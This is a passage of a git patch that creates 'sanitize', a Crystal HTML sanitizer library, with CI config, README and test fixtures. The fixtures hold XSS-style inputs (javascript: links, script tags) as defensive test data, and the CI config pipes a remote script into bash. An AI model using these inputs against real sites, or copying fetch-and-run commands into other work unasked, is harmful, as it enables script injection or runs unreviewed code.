From 52d4885e2c605f2c5a0caf9f0cfe589badda4be5 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Johannes=20M=C3=BCller?= <straightshoota@gmail.com>
Date: Wed, 20 May 2020 01:18:22 +0200
Subject: [PATCH] Initial commit

---
 .circleci/config.yml                          |  94 ++++
 .editorconfig                                 |   9 +
 .gitignore                                    |   9 +
 LICENSE                                       | 202 ++++++++
 Makefile                                      |  56 +++
 README.md                                     | 128 +++++
 scripts/generate-docs.sh                      |  18 +
 shard.yml                                     |  13 +
 spec/html_sanitizer/basic.hrx                 |  70 +++
 spec/html_sanitizer/class.hrx                 |  34 ++
 spec/html_sanitizer/combined_policies.hrx     |  42 ++
 spec/html_sanitizer/combined_policies_spec.cr |  11 +
 spec/html_sanitizer/default.hrx               | 138 +++++
 spec/html_sanitizer/html_sanitizer_spec.cr    | 102 ++++
 spec/html_sanitizer/img.hrx                   |  46 ++
 spec/html_sanitizer/links.hrx                 |  89 ++++
 .../protocol-based-javascript.hrx             | 160 ++++++
 spec/html_sanitizer/protocol_javascript.hrx   |  67 +++
 spec/html_sanitizer/url_spec.cr               |   8 +
 spec/html_sanitizer/xss.hrx                   | 475 ++++++++++++++++++
 spec/spec_helper.cr                           |   1 +
 spec/support/hrx.cr                           |  83 +++
 spec/text_policy.hrx                          |  66 +++
 spec/text_policy_spec.cr                      |  17 +
 spec/uri_sanitizer_spec.cr                    | 113 +++++
 src/adapter/libxml2.cr                        | 137 +++++
 src/policy.cr                                 |  45 ++
 src/policy/html_sanitizer.cr                  | 348 +++++++++++++
 src/policy/html_sanitizer/safelist.cr         |  70 +++
 src/policy/text.cr                            |  23 +
 src/policy/whitelist.cr                       |  57 +++
 src/processor.cr                              | 110 ++++
 src/sanitize.cr                               |   5 +
 src/uri_sanitizer.cr                          |  91 ++++
 34 files changed, 2937 insertions(+)
 create mode 100644 .circleci/config.yml
 create mode 100644 .editorconfig
 create mode 100644 .gitignore
 create mode 100644 LICENSE
 create mode 100644 Makefile
 create mode 100644 README.md
 create mode 100755 scripts/generate-docs.sh
 create mode 100644 shard.yml
 create mode 100644 spec/html_sanitizer/basic.hrx
 create mode 100644 spec/html_sanitizer/class.hrx
 create mode 100644 spec/html_sanitizer/combined_policies.hrx
 create mode 100644 spec/html_sanitizer/combined_policies_spec.cr
 create mode 100644 spec/html_sanitizer/default.hrx
 create mode 100644 spec/html_sanitizer/html_sanitizer_spec.cr
 create mode 100644 spec/html_sanitizer/img.hrx
 create mode 100644 spec/html_sanitizer/links.hrx
 create mode 100644 spec/html_sanitizer/protocol-based-javascript.hrx
 create mode 100644 spec/html_sanitizer/protocol_javascript.hrx
 create mode 100644 spec/html_sanitizer/url_spec.cr
 create mode 100644 spec/html_sanitizer/xss.hrx
 create mode 100644 spec/spec_helper.cr
 create mode 100644 spec/support/hrx.cr
 create mode 100644 spec/text_policy.hrx
 create mode 100644 spec/text_policy_spec.cr
 create mode 100644 spec/uri_sanitizer_spec.cr
 create mode 100644 src/adapter/libxml2.cr
 create mode 100644 src/policy.cr
 create mode 100644 src/policy/html_sanitizer.cr
 create mode 100644 src/policy/html_sanitizer/safelist.cr
 create mode 100644 src/policy/text.cr
 create mode 100644 src/policy/whitelist.cr
 create mode 100644 src/processor.cr
 create mode 100644 src/sanitize.cr
 create mode 100644 src/uri_sanitizer.cr

diff --git a/.circleci/config.yml b/.circleci/config.yml
new file mode 100644
index 0000000..df9b752
--- /dev/null
+++ b/.circleci/config.yml
@@ -0,0 +1,94 @@
+version: 2
+
+dry:
+  restore_shards_cache: &restore_shards_cache
+    keys:
+      - shards-cache-v1-{{ .Branch }}-{{ checksum "shard.yml" }}
+      - shards-cache-v1-{{ .Branch }}
+      - shards-cache-v1
+
+  save_shards_cache: &save_shards_cache
+    key: shards-cache-v1-{{ .Branch }}-{{ checksum "shard.yml" }}
+    paths:
+      - ./shards-cache
+
+jobs:
+  test:
+    docker:
+      - image: crystallang/crystal:latest
+        environment:
+          SHARDS_CACHE_PATH: ./shards-cache
+    steps:
+      - run: crystal --version
+
+      - checkout
+
+      - restore_cache: *restore_shards_cache
+      - run: shards
+      - save_cache: *save_shards_cache
+
+      - run: make test
+
+      - run: crystal tool format --check spec src
+
+  deploy-docs:
+    docker:
+      - image: crystallang/crystal:latest
+        environment:
+          SHARDS_CACHE_PATH: ./shards-cache
+    steps:
+      - run: crystal --version
+
+      - checkout
+
+      - run: scripts/generate-docs.sh
+
+      - run: apt update && apt install -y curl rsync
+      - run:
+          command: curl https://raw.githubusercontent.com/straight-shoota/autodeploy-docs/master/autodeploy-docs.sh | bash
+          environment:
+            GIT_COMMITTER_NAME: cirlceci
+            GIT_COMMITTER_EMAIL: circle@circleci.com
+
+  test-on-nightly:
+    docker:
+      - image: crystallang/crystal:nightly
+        environment:
+          SHARDS_CACHE_PATH: ./shards-cache
+    steps:
+      - run: crystal --version
+
+      - checkout
+
+      - restore_cache: *restore_shards_cache
+      - run: shards
+
+      - run: make test
+
+      - run: crystal tool format --check spec src
+
+workflows:
+  version: 2
+  # Run tests on every single commit
+  ci:
+    jobs:
+      - test
+      # Build and depoy docs only on master branch
+      - deploy-docs:
+          requires:
+            - test
+          filters: &master-only
+            branches:
+              only:
+                - master
+  # Run tests every night using crystal nightly
+  nightly:
+    triggers:
+      - schedule:
+          cron: "0 4 * * *"
+          filters:
+            branches:
+              only:
+                - master
+    jobs:
+      - test-on-nightly
diff --git a/.editorconfig b/.editorconfig
new file mode 100644
index 0000000..163eb75
--- /dev/null
+++ b/.editorconfig
@@ -0,0 +1,9 @@
+root = true
+
+[*.cr]
+charset = utf-8
+end_of_line = lf
+insert_final_newline = true
+indent_style = space
+indent_size = 2
+trim_trailing_whitespace = true
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..0bbd4a9
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,9 @@
+/docs/
+/lib/
+/bin/
+/.shards/
+*.dwarf
+
+# Libraries don't need dependency lock
+# Dependencies will be locked in applications that use them
+/shard.lock
diff --git a/LICENSE b/LICENSE
new file mode 100644
index 0000000..d645695
--- /dev/null
+++ b/LICENSE
@@ -0,0 +1,202 @@
+
+                                 Apache License
+                           Version 2.0, January 2004
+                        http://www.apache.org/licenses/
+
+   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+   1. Definitions.
+
+      "License" shall mean the terms and conditions for use, reproduction,
+      and distribution as defined by Sections 1 through 9 of this document.
+
+      "Licensor" shall mean the copyright owner or entity authorized by
+      the copyright owner that is granting the License.
+
+      "Legal Entity" shall mean the union of the acting entity and all
+      other entities that control, are controlled by, or are under common
+      control with that entity. For the purposes of this definition,
+      "control" means (i) the power, direct or indirect, to cause the
+      direction or management of such entity, whether by contract or
+      otherwise, or (ii) ownership of fifty percent (50%) or more of the
+      outstanding shares, or (iii) beneficial ownership of such entity.
+
+      "You" (or "Your") shall mean an individual or Legal Entity
+      exercising permissions granted by this License.
+
+      "Source" form shall mean the preferred form for making modifications,
+      including but not limited to software source code, documentation
+      source, and configuration files.
+
+      "Object" form shall mean any form resulting from mechanical
+      transformation or translation of a Source form, including but
+      not limited to compiled object code, generated documentation,
+      and conversions to other media types.
+
+      "Work" shall mean the work of authorship, whether in Source or
+      Object form, made available under the License, as indicated by a
+      copyright notice that is included in or attached to the work
+      (an example is provided in the Appendix below).
+
+      "Derivative Works" shall mean any work, whether in Source or Object
+      form, that is based on (or derived from) the Work and for which the
+      editorial revisions, annotations, elaborations, or other modifications
+      represent, as a whole, an original work of authorship. For the purposes
+      of this License, Derivative Works shall not include works that remain
+      separable from, or merely link (or bind by name) to the interfaces of,
+      the Work and Derivative Works thereof.
+
+      "Contribution" shall mean any work of authorship, including
+      the original version of the Work and any modifications or additions
+      to that Work or Derivative Works thereof, that is intentionally
+      submitted to Licensor for inclusion in the Work by the copyright owner
+      or by an individual or Legal Entity authorized to submit on behalf of
+      the copyright owner. For the purposes of this definition, "submitted"
+      means any form of electronic, verbal, or written communication sent
+      to the Licensor or its representatives, including but not limited to
+      communication on electronic mailing lists, source code control systems,
+      and issue tracking systems that are managed by, or on behalf of, the
+      Licensor for the purpose of discussing and improving the Work, but
+      excluding communication that is conspicuously marked or otherwise
+      designated in writing by the copyright owner as "Not a Contribution."
+
+      "Contributor" shall mean Licensor and any individual or Legal Entity
+      on behalf of whom a Contribution has been received by Licensor and
+      subsequently incorporated within the Work.
+
+   2. Grant of Copyright License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      copyright license to reproduce, prepare Derivative Works of,
+      publicly display, publicly perform, sublicense, and distribute the
+      Work and such Derivative Works in Source or Object form.
+
+   3. Grant of Patent License. Subject to the terms and conditions of
+      this License, each Contributor hereby grants to You a perpetual,
+      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+      (except as stated in this section) patent license to make, have made,
+      use, offer to sell, sell, import, and otherwise transfer the Work,
+      where such license applies only to those patent claims licensable
+      by such Contributor that are necessarily infringed by their
+      Contribution(s) alone or by combination of their Contribution(s)
+      with the Work to which such Contribution(s) was submitted. If You
+      institute patent litigation against any entity (including a
+      cross-claim or counterclaim in a lawsuit) alleging that the Work
+      or a Contribution incorporated within the Work constitutes direct
+      or contributory patent infringement, then any patent licenses
+      granted to You under this License for that Work shall terminate
+      as of the date such litigation is filed.
+
+   4. Redistribution. You may reproduce and distribute copies of the
+      Work or Derivative Works thereof in any medium, with or without
+      modifications, and in Source or Object form, provided that You
+      meet the following conditions:
+
+      (a) You must give any other recipients of the Work or
+          Derivative Works a copy of this License; and
+
+      (b) You must cause any modified files to carry prominent notices
+          stating that You changed the files; and
+
+      (c) You must retain, in the Source form of any Derivative Works
+          that You distribute, all copyright, patent, trademark, and
+          attribution notices from the Source form of the Work,
+          excluding those notices that do not pertain to any part of
+          the Derivative Works; and
+
+      (d) If the Work includes a "NOTICE" text file as part of its
+          distribution, then any Derivative Works that You distribute must
+          include a readable copy of the attribution notices contained
+          within such NOTICE file, excluding those notices that do not
+          pertain to any part of the Derivative Works, in at least one
+          of the following places: within a NOTICE text file distributed
+          as part of the Derivative Works; within the Source form or
+          documentation, if provided along with the Derivative Works; or,
+          within a display generated by the Derivative Works, if and
+          wherever such third-party notices normally appear. The contents
+          of the NOTICE file are for informational purposes only and
+          do not modify the License. You may add Your own attribution
+          notices within Derivative Works that You distribute, alongside
+          or as an addendum to the NOTICE text from the Work, provided
+          that such additional attribution notices cannot be construed
+          as modifying the License.
+
+      You may add Your own copyright statement to Your modifications and
+      may provide additional or different license terms and conditions
+      for use, reproduction, or distribution of Your modifications, or
+      for any such Derivative Works as a whole, provided Your use,
+      reproduction, and distribution of the Work otherwise complies with
+      the conditions stated in this License.
+
+   5. Submission of Contributions. Unless You explicitly state otherwise,
+      any Contribution intentionally submitted for inclusion in the Work
+      by You to the Licensor shall be under the terms and conditions of
+      this License, without any additional terms or conditions.
+      Notwithstanding the above, nothing herein shall supersede or modify
+      the terms of any separate license agreement you may have executed
+      with Licensor regarding such Contributions.
+
+   6. Trademarks. This License does not grant permission to use the trade
+      names, trademarks, service marks, or product names of the Licensor,
+      except as required for reasonable and customary use in describing the
+      origin of the Work and reproducing the content of the NOTICE file.
+
+   7. Disclaimer of Warranty. Unless required by applicable law or
+      agreed to in writing, Licensor provides the Work (and each
+      Contributor provides its Contributions) on an "AS IS" BASIS,
+      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+      implied, including, without limitation, any warranties or conditions
+      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+      PARTICULAR PURPOSE. You are solely responsible for determining the
+      appropriateness of using or redistributing the Work and assume any
+      risks associated with Your exercise of permissions under this License.
+
+   8. Limitation of Liability. In no event and under no legal theory,
+      whether in tort (including negligence), contract, or otherwise,
+      unless required by applicable law (such as deliberate and grossly
+      negligent acts) or agreed to in writing, shall any Contributor be
+      liable to You for damages, including any direct, indirect, special,
+      incidental, or consequential damages of any character arising as a
+      result of this License or out of the use or inability to use the
+      Work (including but not limited to damages for loss of goodwill,
+      work stoppage, computer failure or malfunction, or any and all
+      other commercial damages or losses), even if such Contributor
+      has been advised of the possibility of such damages.
+
+   9. Accepting Warranty or Additional Liability. While redistributing
+      the Work or Derivative Works thereof, You may choose to offer,
+      and charge a fee for, acceptance of support, warranty, indemnity,
+      or other liability obligations and/or rights consistent with this
+      License. However, in accepting such obligations, You may act only
+      on Your own behalf and on Your sole responsibility, not on behalf
+      of any other Contributor, and only if You agree to indemnify,
+      defend, and hold each Contributor harmless for any liability
+      incurred by, or claims asserted against, such Contributor by reason
+      of your accepting any such warranty or additional liability.
+
+   END OF TERMS AND CONDITIONS
+
+   APPENDIX: How to apply the Apache License to your work.
+
+      To apply the Apache License to your work, attach the following
+      boilerplate notice, with the fields enclosed by brackets "[]"
+      replaced with your own identifying information. (Don't include
+      the brackets!)  The text should be enclosed in the appropriate
+      comment syntax for the file format. We also recommend that a
+      file or class name and description of purpose be included on the
+      same "printed page" as the copyright notice for easier
+      identification within third-party archives.
+
+   Copyright [yyyy] [name of copyright owner]
+
+   Licensed under the Apache License, Version 2.0 (the "License");
+   you may not use this file except in compliance with the License.
+   You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+   Unless required by applicable law or agreed to in writing, software
+   distributed under the License is distributed on an "AS IS" BASIS,
+   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+   See the License for the specific language governing permissions and
+   limitations under the License.
diff --git a/Makefile b/Makefile
new file mode 100644
index 0000000..b88d98d
--- /dev/null
+++ b/Makefile
@@ -0,0 +1,56 @@
+-include Makefile.local # for optional local options
+
+BUILD_TARGET ::= bin/app
+
+# The shards command to use
+SHARDS ?= shards
+# The crystal command to use
+CRYSTAL ?= crystal
+
+SRC_SOURCES ::= $(shell find src -name '*.cr' 2>/dev/null)
+LIB_SOURCES ::= $(shell find lib -name '*.cr' 2>/dev/null)
+SPEC_SOURCES ::= $(shell find spec -name '*.cr' 2>/dev/null)
+
+.PHONY: test
+test: ## Run the test suite
+test: lib
+	$(CRYSTAL) spec
+
+.PHONY: format
+format: ## Apply source code formatting
+format: $(SRC_SOURCES) $(SPEC_SOURCES)
+	$(CRYSTAL) tool format src spec
+
+docs: ## Generate API docs
+docs: $(SRC_SOURCES) lib
+	$(CRYSTAL) docs -o docs
+
+lib: shard.lock
+	$(SHARDS) install
+	# Touch is necessary because `shards install` always touches shard.lock
+	touch lib
+
+shard.lock: shard.yml
+	$(SHARDS) update
+
+.PHONY: clean
+clean: ## Remove application binary
+clean:
+	@rm -f $(BUILD_TARGET)
+
+.PHONY: help
+help: ## Show this help
+	@echo
+	@printf '\033[34mtargets:\033[0m\n'
+	@grep -hE '^[a-zA-Z_-]+:.*?## .*$$' $(MAKEFILE_LIST) |\
+		sort |\
+		awk 'BEGIN {FS = ":.*?## "}; {printf "  \033[36m%-15s\033[0m %s\n", $$1, $$2}'
+	@echo
+	@printf '\033[34moptional variables:\033[0m\n'
+	@grep -hE '^[a-zA-Z_-]+ \?=.*?## .*$$' $(MAKEFILE_LIST) |\
+		sort |\
+		awk 'BEGIN {FS = " \\?=.*?## "}; {printf "  \033[36m%-15s\033[0m %s\n", $$1, $$2}'
+	@echo
+	@printf '\033[34mrecipes:\033[0m\n'
+	@grep -hE '^##.*$$' $(MAKEFILE_LIST) |\
+		awk 'BEGIN {FS = "## "}; /^## [a-zA-Z_-]/ {printf "  \033[36m%s\033[0m\n", $$2}; /^##  / {printf "  %s\n", $$2}'
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..fdca90d
--- /dev/null
+++ b/README.md
@@ -0,0 +1,128 @@
+# sanitize
+
+`sanitize` is a Crystal library for transforming HTML/XML trees. It's primarily
+used to sanitize HTML from untrusted sources in order to prevent
+[XSS attacks](http://en.wikipedia.org/wiki/Cross-site_scripting) and other
+adversities.
+
+It builds on stdlib's [`XML`](https://crystal-lang.org/api/XML.html) module to
+parse HTML/XML. Based on [libxml2](http://xmlsoft.org/) it's a solid parser and
+turns malformed and malicious input into valid and safe markup.
+
+* Code: [https://github.com/straight-shoota/sanitize](https://github.com/straight-shoota/sanitize)
+* API docs: [https://straight-shoota.github.io/sanitize/api/latest/](https://straight-shoota.github.io/sanitize/api/latest/)
+* Issue tracker: [https://github.com/straight-shoota/sanitize/issues](https://github.com/straight-shoota/sanitize/issues)
+* Shardbox: [https://shardbox.org/shards/sanitize](https://shardbox.org/shards/sanitize)
+
+## Installation
+
+1. Add the dependency to your `shard.yml`:
+
+   ```yaml
+   dependencies:
+     sanitize:
+       github: straight-shoota/sanitize
+   ```
+
+2. Run `shards install`
+
+## Sanitization Features
+
+The `Sanitize::Policy::HTMLSanitizer` policy applies the following sanitization steps. Except
+for the first one (which is essential to the entire process), all can be disabled
+or configured.
+
+* Turns malformed and malicious HTML into valid and safe markup.
+* Strips HTML elements and attributes not included in the safe list.
+* Sanitizes URL attributes (like `href` or `src`) with customizable sanitization
+  policy.
+* Adds `rel="nofollow"` to all links and `rel="noopener"` to links with `target`.
+* Validates values of accepted attributes `align`, `width` and `height`.
+* Filters `class` attributes based on a whitelist (by default all classes are
+  rejected).
+
+## Usage
+
+Transformation is based on rules defined by `Sanitize::Policy` implementations.
+
+The recommended standard policy for HTML sanitization is `Sanitize::Policy::HTMLSanitizer.common`
+which represents good defaults for most use cases.
+It sanitizes user input against a known safe list of accepted elements and their
+attributes.
+
+```crystal
+require "sanitize"
+
+sanitizer = Sanitize::Policy::HTMLSanitizer.common
+sanitizer.process(%(<a href="javascript:alert('foo')">foo</a>)) # => %(foo)
+sanitizer.process(%(<p><a href="foo">foo</a></p>)) # => %(<p><a href="foo" rel="nofollow">foo</a></p>)
+sanitizer.process(%(<img src="foo.jpg">)) # => %(<img src="foo.jpg">)
+sanitizer.process(%(<table><tr><td>foo</td><td>bar</td></tr></table>)) # => %(<table><tr><td>foo</td><td>bar</td></tr></table>)
+```
+
+Sanitization should always run after any other processing (for example rendering
+Markdown) and is a must when including HTML from untrusted sources into a web
+page.
+
+### With Markd
+
+A typical format for user generated content is `Markdown`. Even though it has
+only a very limited feature set compared to HTML, it can still produce
+potentially harmful HTML and is is usually possible to embed raw HTML directly.
+So Sanitization is necessary.
+
+The most common Markdown renderer is [markd](https://shardbox.org/shards/markd),
+so here is a sample how to use it with `sanitize`:
+
+````crystal
+sanitizer = Sanitize::Policy::HTMLSanitizer.common
+# Allow classes with `language-` prefix which are used for syntax highlighting.
+sanitizer.valid_classes << /language-.+/
+
+markdown = <<-MD
+  Sanitization with [https://shardbox.org/shards/sanitize](sanitize) is not that
+  **difficult**.
+  ```cr
+  puts "Hello World!"
+  ```
+  <p><a href="javascript:alert("XSS attack!")">Hello world!</a></p>
+  MD
+
+html = Markd.to_html(markdown)
+sanitized = sanitizer.process(html)
+puts sanitized
+````
+
+The result:
+
+```html
+<p>Sanitization with <a href="sanitize" rel="nofollow">https://shardbox.org/shards/sanitize</a> is not that
+<strong>difficult</strong>.</p>
+<pre><code class="language-cr">puts &quot;Hello World!&quot;
+</code></pre>
+<p>Hello world!</p>
+```
+
+## Limitations
+
+Sanitizing CSS is not supported. Thus `style` attributes can't be accepted in a
+safe way.
+CSS sanitization features may be added when a CSS parsing library is available.
+
+## Security
+
+If you want to privately disclose security-issues, please contact
+[straightshoota](https://keybase.io/straightshoota) on Keybase or
+[straightshoota@gmail.com](mailto:straightshoota@gmail.com) (PGP: `DF2D C9E9 FFB9 6AE0 2070 D5BC F0F3 4963 7AC5 087A`).
+
+## Contributing
+
+1. Fork it ([https://github.com/straight-shoota/sanitize/fork](https://github.com/straight-shoota/sanitize/fork))
+2. Create your feature branch (`git checkout -b my-new-feature`)
+3. Commit your changes (`git commit -am 'Add some feature'`)
+4. Push to the branch (`git push origin my-new-feature`)
+5. Create a new Pull Request
+
+## Contributors
+
+- [Johannes Müller](https://github.com/straight-shoota) - creator and maintainer
diff --git a/scripts/generate-docs.sh b/scripts/generate-docs.sh
new file mode 100755
index 0000000..5dbaf34
--- /dev/null
+++ b/scripts/generate-docs.sh
@@ -0,0 +1,18 @@
+#! /usr/bin/env bash
+
+set -e
+
+GENERATED_DOCS_DIR="./docs"
+
+echo -e "Building docs into ${GENERATED_DOCS_DIR}"
+echo -e "Clearing ${GENERATED_DOCS_DIR} directory"
+rm -rf "${GENERATED_DOCS_DIR}"
+
+echo -e "Running \`make docs\`..."
+make docs
+
+echo -e "Copying README.md"
+
+# "{{" and "{%"" need to be escaped, otherwise Jekyll might interpret the expressions (on Github Pages)
+ESCAPE_TEMPLATE='s/{{/{{"{{"}}/g; s/{\%/{{"{%"}}/g;'
+sed "${ESCAPE_TEMPLATE}" README.md > "${GENERATED_DOCS_DIR}/README.md"
diff --git a/shard.yml b/shard.yml
new file mode 100644
index 0000000..92498c0
--- /dev/null
+++ b/shard.yml
@@ -0,0 +1,13 @@
+name: sanitize
+version: 0.1.0
+
+authors:
+  - Johannes Müller <straightshoota@gmail.com>
+
+crystal: 0.34.0
+
+license: Apache-2.0
+
+development_dependencies:
+  hrx:
+    github: straight-shoota/hrx
diff --git a/spec/html_sanitizer/basic.hrx b/spec/html_sanitizer/basic.hrx
new file mode 100644
index 0000000..e2c1047
--- /dev/null
+++ b/spec/html_sanitizer/basic.hrx
@@ -0,0 +1,70 @@
+<===> empty/document.html
+<===>
+
+
+<===> pending:skeleton/document.html
+<html>
+  <body>
+  </body>
+</html>
+
+<===>
+
+
+<===> invalid/fragment.html
+<invalid>foo<p>bar</p>bazz</invalid><blockquote>quux</blockquote>
+<===> invalid/common.html
+foo<p>bar</p>bazz<blockquote>quux</blockquote>
+<===>
+
+
+
+<===> invalid-div/fragment.html
+<invalid>foo<p>bar</p>bazz</invalid><article>quux</article>
+<===> invalid-div/common.html
+foo<p>bar</p>bazz quux
+<===>
+
+
+<===> basic/fragment.html
+<b>Lo<!-- comment -->rem</b> <a href="pants" title="foo" style="text-decoration: underline;">ipsum</a> <a href="http://foo.com/"><strong>dolor</strong></a> sit<br/>amet <style>.foo { color: #fff; }</style> <script>alert("hello world");</script>
+<===> basic/common.html
+<b>Lorem</b> <a href="pants" title="foo" rel="nofollow">ipsum</a> <a href="http://foo.com/" rel="nofollow"><strong>dolor</strong></a> sit<br/>amet
+<===>
+
+
+<===> malformed/fragment.html
+Lo<!-- comment -->rem</b> <a href=pants title="foo>ipsum <a href="http://foo.com/"><strong>dolor</a></strong> sit<br/>amet <script>alert("hello world");
+<===> malformed/common.html
+Lorem <a href="pants" title="foo&gt;ipsum &lt;a href=" rel="nofollow"><strong>dolor</strong></a> sit<br/>amet
+<===>
+
+
+
+<===> unclosed/fragment.html
+<p>a</p><blockquote>b
+<===> unclosed/common.html
+<p>a</p><blockquote>b</blockquote>
+<===>
+
+
+
+<===> malicious/fragment.html
+<b>Lo<!-- comment -->rem</b> <a href="javascript:pants" title="foo">ipsum</a> <a href="http://foo.com/"><strong>dolor</strong></a> sit<br/>amet <<foo>script>alert("hello world");</script>
+<===> malicious/common.html
+<b>Lorem</b> ipsum <a href="http://foo.com/" rel="nofollow"><strong>dolor</strong></a> sit<br/>amet &lt;script&gt;alert(&quot;hello world&quot;);
+<===>
+
+
+<===> target="_blank"/fragment.html
+<a href="foo" target="_blank">foo</a>
+<===> target="_blank"/common.html
+<a href="foo" rel="nofollow">foo</a>
+<===>
+
+
+<===> percent encoded URL/fragment.html
+<img src="https://github.com/RomainFranceschini/quartz/workflows/Quartz%20CI/badge.svg?branch=master" alt="CI Status"/>
+<===> percent encoded URL/common.html
+<img src="https://github.com/RomainFranceschini/quartz/workflows/Quartz%20CI/badge.svg?branch=master" alt="CI Status"/>
+<===>
diff --git a/spec/html_sanitizer/class.hrx b/spec/html_sanitizer/class.hrx
new file mode 100644
index 0000000..897c1c2
--- /dev/null
+++ b/spec/html_sanitizer/class.hrx
@@ -0,0 +1,34 @@
+<===> reject/fragment.html
+<div class="foo"/>
+<===> reject/common.html
+<div/>
+<===> reject/allow-prefix.html
+<div/>
+<===>
+
+
+<===> allow-with-prefix/fragment.html
+<div class="allowed-foo"/>
+<===> allow-with-prefix/common.html
+<div/>
+<===> allow-with-prefix/allow-prefix.html
+<div class="allowed-foo"/>
+<===>
+
+
+<===> reject-non-prefix/fragment.html
+<div class="x-allowed-foo"/>
+<===> reject-non-prefix/common.html
+<div/>
+<===> reject-non-prefix/allow-prefix.html
+<div/>
+<===>
+
+
+<===> allow-explicit/fragment.html
+<div class="explicitly-allowed"/>
+<===> allow-explicit/common.html
+<div/>
+<===> allow-explicit/allow-prefix.html
+<div class="explicitly-allowed"/>
+<===>
diff --git a/spec/html_sanitizer/combined_policies.hrx b/spec/html_sanitizer/combined_policies.hrx
new file mode 100644
index 0000000..b648ae6
--- /dev/null
+++ b/spec/html_sanitizer/combined_policies.hrx
@@ -0,0 +1,42 @@
+<===> basic/fragment.html
+<b>Lo<!-- comment -->rem</b> <a href="pants" title="foo" style="text-decoration: underline;">ipsum</a> <a href="http://foo.com/"><strong>dolor</strong></a> sit<br/>amet <style>.foo { color: #fff; }</style> <script>alert("hello world");</script>
+<===> basic/text.html
+Lorem ipsum dolor sit amet
+<===> basic/inline.html
+<b>Lorem</b> ipsum <strong>dolor</strong> sit amet
+<===> basic/common.html
+<b>Lorem</b> <a href="pants" title="foo" rel="nofollow">ipsum</a> <a href="http://foo.com/" rel="nofollow"><strong>dolor</strong></a> sit<br/>amet
+<===>
+
+
+<===> malformed/fragment.html
+Lo<!-- comment -->rem</b> <a href=pants title="foo>ipsum <a href="http://foo.com/"><strong>dolor</a></strong> sit<br/>amet <script>alert("hello world");
+<===> malformed/text.html
+Lorem dolor sit amet
+<===> malformed/inline.html
+Lorem <strong>dolor</strong> sit amet
+<===> malformed/common.html
+Lorem <a href="pants" title="foo&gt;ipsum &lt;a href=" rel="nofollow"><strong>dolor</strong></a> sit<br/>amet
+<===>
+
+
+<===> unclosed/fragment.html
+<p>a</p><blockquote>b
+<===> unclosed/text.html
+a b
+<===> unclosed/inline.html
+a b
+<===> unclosed/common.html
+<p>a</p><blockquote>b</blockquote>
+<===>
+
+
+<===> malicious/fragment.html
+<b>Lo<!-- comment -->rem</b> <a href="javascript:pants" title="foo">ipsum</a> <a href="http://foo.com/"><strong>dolor</strong></a> sit<br/>amet <<foo>script>alert("hello world");</script>
+<===> malicious/text.html
+Lorem ipsum dolor sit amet &lt;script&gt;alert(&quot;hello world&quot;);
+<===> malicious/inline.html
+<b>Lorem</b> ipsum <strong>dolor</strong> sit amet &lt;script&gt;alert(&quot;hello world&quot;);
+<===> malicious/common.html
+<b>Lorem</b> ipsum <a href="http://foo.com/" rel="nofollow"><strong>dolor</strong></a> sit<br/>amet &lt;script&gt;alert(&quot;hello world&quot;);
+<===>
diff --git a/spec/html_sanitizer/combined_policies_spec.cr b/spec/html_sanitizer/combined_policies_spec.cr
new file mode 100644
index 0000000..5751fba
--- /dev/null
+++ b/spec/html_sanitizer/combined_policies_spec.cr
@@ -0,0 +1,11 @@
+require "../support/hrx"
+require "../../src/processor"
+require "../../src/policy/html_sanitizer"
+require "../../src/policy/text"
+
+run_hrx_samples Path["./combined_policies.hrx"], {
+  "text"   => Sanitize::Policy::Text.new,
+  "inline" => Sanitize::Policy::HTMLSanitizer.inline.no_links,
+  "basic"  => Sanitize::Policy::HTMLSanitizer.basic,
+  "common" => Sanitize::Policy::HTMLSanitizer.common,
+}
diff --git a/spec/html_sanitizer/default.hrx b/spec/html_sanitizer/default.hrx
new file mode 100644
index 0000000..627adb8
--- /dev/null
+++ b/spec/html_sanitizer/default.hrx
@@ -0,0 +1,138 @@
+<===> invalid/fragment.html
+<invalid>foo<p>bar</p>bazz</invalid><div>quux</div>
+<===> invalid/stripped.html
+foo<p>bar</p>bazz<div>quux</div>
+<===> invalid/escaped.html
+&lt;invalid&gt;foo&lt;p&gt;bar&lt;/p&gt;bazz&lt;/invalid&gt;<div>quux</div>
+<===> invalid/pruned.html
+<div>quux</div>
+<===>
+
+
+<===> bad_argument/fragment.html
+<div invalid="bar">foo</div>
+<===> bad_argument/stripped.html
+<div>foo</div>
+<===>
+
+<==> whitewash/fragment.html
+<o:div>no</o:div><div id='no'>foo</div><invalid>bar</invalid><!--[if gts mso9]><div>microsofty stuff</div><![endif]-->
+<==> whitewash/pruned.html
+<div>foo</div>
+<==>
+
+
+<===> nofollow/fragment.html
+<a href="http://www.example.com/">Click here</a>
+<===> nofollow/stripped.html
+<a href="http://www.example.com/" rel="nofollow">Click here</a>
+<===>
+
+
+<===> nofollow-rel/fragment.html
+<a href="http://www.example.com/" rel="noopener">Click here</a>
+<===> nofollow-rel/stripped.html
+<a href="http://www.example.com/" rel="noopener nofollow">Click here</a>
+<===>
+
+
+<===> unprintable/fragment.html
+<b>Lo\u2029ofah ro\u2028cks!</b><script>x\u2028y</script>
+<===> unprintable/stripped.html
+<b>Loofah rocks!</b><script>xy</script>
+<===>
+
+
+<===> msword/fragment.html
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="ProgId" content="Word.Document"><meta name="Generator" content="Microsoft Word 11"><meta name="Originator" content="Microsoft Word 11"><link rel="File-List" href="file:///C:%5CDOCUME%7E1%5CNICOLE%7E1%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"><!--[if gte mso 9]><xml>
+<w:WordDocument>
+  <w:View>Normal</w:View>
+  <w:Zoom>0</w:Zoom>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
